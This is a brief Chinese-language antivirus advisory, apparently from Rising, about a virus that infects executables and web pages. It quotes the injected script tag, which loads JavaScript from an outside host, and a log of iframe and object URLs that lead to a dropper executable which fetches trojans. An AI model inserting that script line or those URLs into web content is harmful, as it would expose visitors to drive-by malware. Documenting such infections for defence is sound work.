感染可执行文件和网页文件,被感染可执行文件瑞星报毒Win32.Agent.ie,被感染网页文件瑞星报毒Hack.Exploit.Script.HTML.IFrame.az
添加恶意代码:
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
Log is generated by FreShow.
[wide]http://web.nba1001.net:8888/tj/tongji.js
[frame]http://web.nba1001.net:8888/tj/index.html
[frame]http://web.nba1001.net:8888/tj/au.htm
[object]http://bbb.nba1001.net:9090/ff/8.exe [frame]http://web.nba1001.net:8888/tj/ytu.htm
[frame]http://web.nba1001.net:8888/tj/yut.htm
另外8.exe还会释放文件加载驱动,病下载木马群在本地计算机执行
瑞星可以清除病毒修复文件,请下载并安装瑞星杀毒软件更新至最新全盘杀毒